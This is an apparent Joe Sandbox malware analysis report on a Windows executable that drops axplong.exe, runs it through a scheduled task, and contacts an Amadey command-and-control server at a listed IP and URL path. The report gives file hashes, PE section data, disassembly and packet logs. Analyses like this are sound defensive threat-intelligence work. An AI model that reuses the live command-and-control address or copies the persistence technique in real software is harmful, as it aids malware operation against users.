http://185.215.113.16/Jo89Ku7d/index.phpCHIz	axplong.exe, 00000006.00000002.2983995234.0000000000D12000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://185.215.113.16/Jo89Ku7d/index.phpMicR	axplong.exe, 00000006.00000002.2983995234.0000000000D12000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://185.215.113.16/Jo89Ku7d/index.php_RE&R	axplong.exe, 00000006.00000002.2983995234.0000000000D12000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://185.215.113.16/Jo89Ku7d/index.phpb	axplong.exe, 00000006.00000002.2983995234.0000000000D12000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://185.215.113.16/Jo89Ku7d/index.phpinb	axplong.exe, 00000006.00000002.2983995234.0000000000D12000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://185.215.113.16/Jo89Ku7d/index.phptem	axplong.exe, 00000006.00000002.2983995234.0000000000D12000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://185.215.113.16/Jo89Ku7d/index.phpY	axplong.exe, 00000006.00000002.2983995234.0000000000D12000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://185.215.113.16/Jo89Ku7d/index.phpncoded)	axplong.exe, 00000006.00000002.2983995234.0000000000D12000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://185.215.113.16/Jo89Ku7d/index.phpO	axplong.exe, 00000006.00000002.2983995234.0000000000D12000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://185.215.113.16/Jo89Ku7d/index.phpN	axplong.exe, 00000006.00000002.2983995234.0000000000D12000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://185.215.113.16/Jo89Ku7d/index.phpb1a30a186ec2d30be6db0b5	axplong.exe, 00000006.00000002.2983995234.0000000000D12000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://185.215.113.16/Jo89Ku7d/index.phpL	axplong.exe, 00000006.00000002.2983995234.0000000000D12000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://185.215.113.16/Jo89Ku7d/index.phpIVE	axplong.exe, 00000006.00000002.2983995234.0000000000D12000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://185.215.113.16/Jo89Ku7d/index.phpE	axplong.exe, 00000006.00000002.2983995234.0000000000D12000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://185.215.113.16/Jo89Ku7d/index.phpxSu	axplong.exe, 00000006.00000002.2983995234.0000000000D12000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://185.215.113.16/Jo89Ku7d/index.phpD;.N	axplong.exe, 00000006.00000002.2983995234.0000000000D12000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://185.215.113.16/Jo89Ku7d/index.phpPC	axplong.exe, 00000006.00000002.2983995234.0000000000D12000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://185.215.113.16/Jo89Ku7d/index.phpDri	axplong.exe, 00000006.00000002.2983995234.0000000000D12000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://185.215.113.16/Jo89Ku7d/index.php?	axplong.exe, 00000006.00000002.2983995234.0000000000D12000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://185.215.113.16/Jo89Ku7d/index.phpw	axplong.exe, 00000006.00000002.2983995234.0000000000D12000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://185.215.113.16/Jo89Ku7d/index.phpa=C	axplong.exe, 00000006.00000002.2983995234.0000000000D12000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://185.215.113.16/Jo89Ku7d/index.phpndows	axplong.exe, 00000006.00000002.2983995234.0000000000D12000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://185.215.113.16/Jo89Ku7d/index.phpSy	axplong.exe, 00000006.00000002.2983995234.0000000000D12000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://185.215.113.16/Jo89Ku7d/index.php1	axplong.exe, 00000006.00000002.2983995234.0000000000D12000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://185.215.113.16/Jo89Ku7d/index.phprs	axplong.exe, 00000006.00000002.2983995234.0000000000D12000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
185.215.113.16	unknown	Portugal		206894	WHOLESALECONNECTIONSNL	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1520154
Start date and time:	2024-09-27 05:51:05 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 5m 39s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	8
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	file.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@5/3@0/1
EGA Information:	Successful, ratio: 25%
HCA Information:	Failed
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target axplong.exe, PID 7468 because there are no executed function
Execution Graph export aborted for target axplong.exe, PID 7476 because there are no executed function
Execution Graph export aborted for target file.exe, PID 7276 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtDeviceIoControlFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
VT rate limit hit for: file.exe

Simulations

Behavior and APIs

Time	Type	Description
04:52:05	Task Scheduler	Run new task: axplong path: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
23:53:01	API Interceptor	173944x Sleep call for process: axplong.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
185.215.113.16	file.exe	Get hash	malicious	LummaC, Amadey, CryptOne, LummaC Stealer, PureLog Stealer, RedLine, Socks5Systemz	Browse	185.215.113.16/Jo89Ku7d/index.php
	file.exe	Get hash	malicious	Amadey	Browse	185.215.113.16/Jo89Ku7d/index.php
	file.exe	Get hash	malicious	Amadey	Browse	185.215.113.16/Jo89Ku7d/index.php
	file.exe	Get hash	malicious	Amadey	Browse	185.215.113.16/Jo89Ku7d/index.php
	file.exe	Get hash	malicious	Amadey	Browse	185.215.113.16/Jo89Ku7d/index.php
	file.exe	Get hash	malicious	Amadey	Browse	185.215.113.16/Jo89Ku7d/index.php
	file.exe	Get hash	malicious	Amadey, DarkTortilla	Browse	185.215.113.16/Jo89Ku7d/index.php
	file.exe	Get hash	malicious	Amadey	Browse	185.215.113.16/Jo89Ku7d/index.php
	file.exe	Get hash	malicious	Amadey	Browse	185.215.113.16/Jo89Ku7d/index.php
	file.exe	Get hash	malicious	Amadey	Browse	185.215.113.16/Jo89Ku7d/index.php

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
WHOLESALECONNECTIONSNL	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.37
	file.exe	Get hash	malicious	LummaC, Amadey, CryptOne, LummaC Stealer, PureLog Stealer, RedLine, Socks5Systemz	Browse	185.215.113.103
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	185.215.113.37
	file.exe	Get hash	malicious	Amadey	Browse	185.215.113.16
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.37
	file.exe	Get hash	malicious	Amadey	Browse	185.215.113.16
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.37
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	185.215.113.37
	file.exe	Get hash	malicious	Amadey	Browse	185.215.113.16
	file.exe	Get hash	malicious	Amadey	Browse	185.215.113.16

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1930240
Entropy (8bit):	7.951101185382818
Encrypted:	false
SSDEEP:	24576:2F9unCPFskHeI52FzFYhJFqOZAZKKF0m8qaYJgprK8EaCAJE9v139qPVKZQmzEIv:2FCAGkHezz7nPN81L+lEHOrvYbz4
MD5:	8367D2F6EF5E11DB59EC8E4295378853
SHA1:	9653847B6EC9F36137FBE7C68B991E74F54CC7DD
SHA-256:	08CD0CA2C4916C3F2668E228F72B26A3DE263D37B746DCA48C83202691833752
SHA-512:	681420D694AD6AA33D4150137892C7199DEE045F3BF1D38174D25C14C38BC99A4518C6E9C860CDC66D3F00D1C8C6B477A379D96E68D6DE8BCA55919B2B309FAC
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........PJ.r>..r>..r>...=..r>...;.(r>.].:..r>.].=..r>.].;..r>...:..r>...?..r>..r?.^r>...7..r>......r>...<..r>.Rich.r>.................PE..L....@.f.............................pL...........@...........................L...........@.................................W...k...........................dXL..............................XL..................................................... . ............................@....rsrc...............................@....idata ............................@... .P+.........................@...ibpmkgdy.`....2..Z..................@...kfashbkw.....`L......N..............@....taggant.0...pL.."...R..............@...........................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe:Zone.Identifier

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	ASCII text, with CRLF line terminators
Category:	modified
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Reputation:	high, very likely benign file
Preview:	[ZoneTransfer]....ZoneId=0

C:\Windows\Tasks\axplong.job

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	data
Category:	dropped
Size (bytes):	286
Entropy (8bit):	3.4424175909307846
Encrypted:	false
SSDEEP:	6:KdpbXpRKUEZ+lX1lOJUPelkDdtPjgsW2YRZuy0lb9zt0:KrrpRKQ1lOmeeDHjzvYRQV5zt0
MD5:	93629468C76715DB38DA85BA8B02E320
SHA1:	5FA7D03E3C40302BA9CBBFBC2DAEAA9AC9BD94C8
SHA-256:	2407EAC3A955130C62798784C53019797E601E11C68898B77FDE95F8FF1FD426
SHA-512:	17DAAC17DC34548354D97E260B82D3BD2CE68A8088D92E3DE8BA1AE4A7D578963F1CF32F4847CA757699C8E4B9A362DA57EF615651C41F55208921F5D2B887B5
Malicious:	false
Reputation:	low
Preview:	.....t.@8+vB.X?_Q.w.F.......<... .....s.......... ....................9.C.:.\.U.s.e.r.s.\.j.o.n.e.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.4.4.1.1.1.d.b.c.4.9.\.a.x.p.l.o.n.g...e.x.e.........J.O.N.E.S.-.P.C.\.j.o.n.e.s...................0.................5.@3P.........................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.951101185382818
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	file.exe
File size:	1'930'240 bytes
MD5:	8367d2f6ef5e11db59ec8e4295378853
SHA1:	9653847b6ec9f36137fbe7c68b991e74f54cc7dd
SHA256:	08cd0ca2c4916c3f2668e228f72b26a3de263d37b746dca48c83202691833752
SHA512:	681420d694ad6aa33d4150137892c7199dee045f3bf1d38174d25c14c38bc99a4518c6e9c860cdc66d3f00d1c8c6b477a379d96e68d6de8bca55919b2b309fac
SSDEEP:	24576:2F9unCPFskHeI52FzFYhJFqOZAZKKF0m8qaYJgprK8EaCAJE9v139qPVKZQmzEIv:2FCAGkHezz7nPN81L+lEHOrvYbz4
TLSH:	E19533432551E153CEA27D7307102412F9298B2309BC2E355F4D6AF79817FBD9A2CEAD
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........PJ.r>..r>..r>...=..r>...;.(r>.].:..r>.].=..r>.].;..r>...:..r>...?..r>..r?.^r>...7..r>......r>...<..r>.Rich.r>................

File Icon


Icon Hash:	90cececece8e8eb0

Static PE Info

General

Entrypoint:	0x8c7000
Entrypoint Section:	.taggant
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp:	0x66A240BE [Thu Jul 25 12:10:38 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	0
File Version Major:	6
File Version Minor:	0
Subsystem Version Major:	6
Subsystem Version Minor:	0
Import Hash:	2eabe9054cad5152567f0699947a2c5b

Entrypoint Preview

Instruction
jmp 00007F2E04C0F79Ah
rsqrtps xmm3, dqword ptr [00000000h]
add cl, ch
add byte ptr [eax], ah
add byte ptr [eax], al
add byte ptr [0000000Ah], al
add byte ptr [eax], al
add byte ptr [eax], dl
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [ecx], al
or al, byte ptr [eax]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [0100000Ah], al
or al, byte ptr [eax]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [ecx+00000080h], dh
add byte ptr [eax], al
add byte ptr [eax], dh
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax+eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x6a057	0x6b	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x69000	0x1e0	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x4c5864	0x10	ibpmkgdy
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x4c5814	0x18	ibpmkgdy
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
	0x1000	0x68000	0x2de00	40c0c36fc2971a3a04aa1d9a674092fc	False	0.9965940054495913	data	7.974553430259763	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x69000	0x1e0	0x200	dfc65756e80fe2267c8f5ee1b1a0ed8a	False	0.580078125	data	4.558318256855508	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata	0x6a000	0x1000	0x200	cc76e3822efdc911f469a3e3cc9ce9fe	False	0.1484375	data	1.0428145631430756	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
	0x6b000	0x2b5000	0x200	eb2acc46687cc4209afcc321145fd2dc	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
ibpmkgdy	0x320000	0x1a6000	0x1a5a00	b1d15f47662eaff2894afb1bc226377c	False	0.9946698738141121	data	7.9543734899912995	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
kfashbkw	0x4c6000	0x1000	0x400	b14af779ce4f888daf92103fbb1a08c6	False	0.76171875	data	6.00029831144431	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.taggant	0x4c7000	0x3000	0x2200	5c58e54f153f676c4c9fbacb29100983	False	0.0661764705882353	DOS executable (COM)	0.7641369703033931	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_MANIFEST	0x4c5874	0x17d	XML 1.0 document, ASCII text, with CRLF line terminators	English	United States	0.5931758530183727

Imports

DLL	Import
kernel32.dll	lstrcpy

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-09-27T05:53:03.600394+0200	2856147	ETPRO MALWARE Amadey CnC Activity M3	1	192.168.2.4	49737	185.215.113.16	80	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 27, 2024 05:53:02.884510994 CEST	49737	80	192.168.2.4	185.215.113.16
Sep 27, 2024 05:53:02.889308929 CEST	80	49737	185.215.113.16	192.168.2.4
Sep 27, 2024 05:53:02.889442921 CEST	49737	80	192.168.2.4	185.215.113.16
Sep 27, 2024 05:53:02.895417929 CEST	49737	80	192.168.2.4	185.215.113.16
Sep 27, 2024 05:53:02.900603056 CEST	80	49737	185.215.113.16	192.168.2.4
Sep 27, 2024 05:53:03.599792957 CEST	80	49737	185.215.113.16	192.168.2.4
Sep 27, 2024 05:53:03.600394011 CEST	49737	80	192.168.2.4	185.215.113.16
Sep 27, 2024 05:53:03.607597113 CEST	49737	80	192.168.2.4	185.215.113.16
Sep 27, 2024 05:53:03.612399101 CEST	80	49737	185.215.113.16	192.168.2.4
Sep 27, 2024 05:53:03.964904070 CEST	80	49737	185.215.113.16	192.168.2.4
Sep 27, 2024 05:53:03.968730927 CEST	49737	80	192.168.2.4	185.215.113.16
Sep 27, 2024 05:53:04.085433960 CEST	49737	80	192.168.2.4	185.215.113.16
Sep 27, 2024 05:53:04.085828066 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 27, 2024 05:53:04.090616941 CEST	80	49737	185.215.113.16	192.168.2.4
Sep 27, 2024 05:53:04.090634108 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 27, 2024 05:53:04.090719938 CEST	49737	80	192.168.2.4	185.215.113.16
Sep 27, 2024 05:53:04.090780020 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 27, 2024 05:53:04.090979099 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 27, 2024 05:53:04.095761061 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 27, 2024 05:53:04.826024055 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 27, 2024 05:53:04.826086044 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 27, 2024 05:53:04.827244043 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 27, 2024 05:53:04.853068113 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 27, 2024 05:53:05.084682941 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 27, 2024 05:53:05.084830999 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 27, 2024 05:53:05.194510937 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 27, 2024 05:53:05.194894075 CEST	49739	80	192.168.2.4	185.215.113.16
Sep 27, 2024 05:53:05.200073004 CEST	80	49739	185.215.113.16	192.168.2.4
Sep 27, 2024 05:53:05.200177908 CEST	49739	80	192.168.2.4	185.215.113.16
Sep 27, 2024 05:53:05.200288057 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 27, 2024 05:53:05.200356960 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 27, 2024 05:53:05.202043056 CEST	49739	80	192.168.2.4	185.215.113.16
Sep 27, 2024 05:53:05.206762075 CEST	80	49739	185.215.113.16	192.168.2.4
Sep 27, 2024 05:53:09.194917917 CEST	49739	80	192.168.2.4	185.215.113.16
Sep 27, 2024 05:53:09.196608067 CEST	49740	80	192.168.2.4	185.215.113.16
Sep 27, 2024 05:53:09.202860117 CEST	80	49740	185.215.113.16	192.168.2.4
Sep 27, 2024 05:53:09.203039885 CEST	49740	80	192.168.2.4	185.215.113.16
Sep 27, 2024 05:53:09.207912922 CEST	49740	80	192.168.2.4	185.215.113.16
Sep 27, 2024 05:53:09.212676048 CEST	80	49740	185.215.113.16	192.168.2.4
Sep 27, 2024 05:53:09.908310890 CEST	80	49740	185.215.113.16	192.168.2.4
Sep 27, 2024 05:53:09.908417940 CEST	49740	80	192.168.2.4	185.215.113.16
Sep 27, 2024 05:53:10.022764921 CEST	49740	80	192.168.2.4	185.215.113.16
Sep 27, 2024 05:53:10.023092031 CEST	49741	80	192.168.2.4	185.215.113.16
Sep 27, 2024 05:53:10.027882099 CEST	80	49741	185.215.113.16	192.168.2.4
Sep 27, 2024 05:53:10.027911901 CEST	80	49740	185.215.113.16	192.168.2.4
Sep 27, 2024 05:53:10.028122902 CEST	49740	80	192.168.2.4	185.215.113.16
Sep 27, 2024 05:53:10.028127909 CEST	49741	80	192.168.2.4	185.215.113.16
Sep 27, 2024 05:53:10.028362036 CEST	49741	80	192.168.2.4	185.215.113.16
Sep 27, 2024 05:53:10.033802986 CEST	80	49741	185.215.113.16	192.168.2.4
Sep 27, 2024 05:53:10.818706036 CEST	80	49741	185.215.113.16	192.168.2.4
Sep 27, 2024 05:53:10.818876982 CEST	49741	80	192.168.2.4	185.215.113.16
Sep 27, 2024 05:53:10.819758892 CEST	49741	80	192.168.2.4	185.215.113.16
Sep 27, 2024 05:53:10.824554920 CEST	80	49741	185.215.113.16	192.168.2.4
Sep 27, 2024 05:53:11.041826963 CEST	80	49741	185.215.113.16	192.168.2.4
Sep 27, 2024 05:53:11.041883945 CEST	49741	80	192.168.2.4	185.215.113.16
Sep 27, 2024 05:53:11.147711992 CEST	49741	80	192.168.2.4	185.215.113.16
Sep 27, 2024 05:53:11.148135900 CEST	49742	80	192.168.2.4	185.215.113.16
Sep 27, 2024 05:53:11.152817011 CEST	80	49741	185.215.113.16	192.168.2.4
Sep 27, 2024 05:53:11.152889013 CEST	49741	80	192.168.2.4	185.215.113.16
Sep 27, 2024 05:53:11.152889967 CEST	80	49742	185.215.113.16	192.168.2.4
Sep 27, 2024 05:53:11.152961016 CEST	49742	80	192.168.2.4	185.215.113.16
Sep 27, 2024 05:53:11.153100014 CEST	49742	80	192.168.2.4	185.215.113.16
Sep 27, 2024 05:53:11.157830000 CEST	80	49742	185.215.113.16	192.168.2.4
Sep 27, 2024 05:53:11.850214958 CEST	80	49742	185.215.113.16	192.168.2.4
Sep 27, 2024 05:53:11.850311041 CEST	49742	80	192.168.2.4	185.215.113.16
Sep 27, 2024 05:53:11.851105928 CEST	49742	80	192.168.2.4	185.215.113.16
Sep 27, 2024 05:53:11.861911058 CEST	80	49742	185.215.113.16	192.168.2.4
Sep 27, 2024 05:53:12.079926968 CEST	80	49742	185.215.113.16	192.168.2.4
Sep 27, 2024 05:53:12.080095053 CEST	49742	80	192.168.2.4	185.215.113.16
Sep 27, 2024 05:53:12.230173111 CEST	49742	80	192.168.2.4	185.215.113.16
Sep 27, 2024 05:53:12.230541945 CEST	49743	80	192.168.2.4	185.215.113.16
Sep 27, 2024 05:53:12.240308046 CEST	80	49743	185.215.113.16	192.168.2.4
Sep 27, 2024 05:53:12.240446091 CEST	49743	80	192.168.2.4	185.215.113.16
Sep 27, 2024 05:53:12.240636110 CEST	49743	80	192.168.2.4	185.215.113.16
Sep 27, 2024 05:53:12.240816116 CEST	80	49742	185.215.113.16	192.168.2.4
Sep 27, 2024 05:53:12.240971088 CEST	49742	80	192.168.2.4	185.215.113.16
Sep 27, 2024 05:53:12.253932953 CEST	80	49743	185.215.113.16	192.168.2.4
Sep 27, 2024 05:53:12.988409996 CEST	80	49743	185.215.113.16	192.168.2.4
Sep 27, 2024 05:53:12.988504887 CEST	49743	80	192.168.2.4	185.215.113.16
Sep 27, 2024 05:53:12.993175030 CEST	49743	80	192.168.2.4	185.215.113.16
Sep 27, 2024 05:53:13.000787020 CEST	80	49743	185.215.113.16	192.168.2.4
Sep 27, 2024 05:53:13.231659889 CEST	80	49743	185.215.113.16	192.168.2.4
Sep 27, 2024 05:53:13.231781006 CEST	49743	80	192.168.2.4	185.215.113.16
Sep 27, 2024 05:53:13.335316896 CEST	49743	80	192.168.2.4	185.215.113.16
Sep 27, 2024 05:53:13.335771084 CEST	49744	80	192.168.2.4	185.215.113.16
Sep 27, 2024 05:53:13.366638899 CEST	80	49744	185.215.113.16	192.168.2.4
Sep 27, 2024 05:53:13.366727114 CEST	49744	80	192.168.2.4	185.215.113.16
Sep 27, 2024 05:53:13.366993904 CEST	49744	80	192.168.2.4	185.215.113.16
Sep 27, 2024 05:53:13.368673086 CEST	80	49743	185.215.113.16	192.168.2.4
Sep 27, 2024 05:53:13.368735075 CEST	49743	80	192.168.2.4	185.215.113.16
Sep 27, 2024 05:53:13.375633955 CEST	80	49744	185.215.113.16	192.168.2.4
Sep 27, 2024 05:53:14.112597942 CEST	80	49744	185.215.113.16	192.168.2.4
Sep 27, 2024 05:53:14.112660885 CEST	49744	80	192.168.2.4	185.215.113.16
Sep 27, 2024 05:53:14.113521099 CEST	49744	80	192.168.2.4	185.215.113.16
Sep 27, 2024 05:53:14.130439997 CEST	80	49744	185.215.113.16	192.168.2.4
Sep 27, 2024 05:53:14.357228041 CEST	80	49744	185.215.113.16	192.168.2.4
Sep 27, 2024 05:53:14.357491016 CEST	49744	80	192.168.2.4	185.215.113.16
Sep 27, 2024 05:53:14.460541010 CEST	49744	80	192.168.2.4	185.215.113.16
Sep 27, 2024 05:53:14.460963011 CEST	49745	80	192.168.2.4	185.215.113.16
Sep 27, 2024 05:53:14.465831041 CEST	80	49744	185.215.113.16	192.168.2.4
Sep 27, 2024 05:53:14.466115952 CEST	49744	80	192.168.2.4	185.215.113.16
Sep 27, 2024 05:53:14.466202974 CEST	80	49745	185.215.113.16	192.168.2.4
